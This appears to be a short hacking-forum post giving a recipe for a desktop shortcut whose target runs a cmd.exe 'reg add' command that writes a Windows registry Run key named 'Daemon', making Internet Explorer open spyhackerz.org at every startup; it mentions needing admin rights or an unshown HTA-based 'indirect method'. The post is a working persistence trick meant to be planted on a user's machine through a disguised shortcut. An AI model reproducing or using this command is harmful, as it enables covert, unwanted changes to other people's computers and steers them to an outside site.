Group: User Level:
Posts: 77 Joined: 6/3/2023 IP-Address: saved

| For this to work a user will have to have admin privileges or use a indirect method (I have one for hta but it's not at hand).
1) Right click on desktop, New Shortcut
Location:
cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Daemon /t REG_SZ /d "iexplore.exe http://spyhackerz.org" /f
Name: Whatever the user want
This will start internet explorer with http://spyhackerz.org on every Windows Startup.
|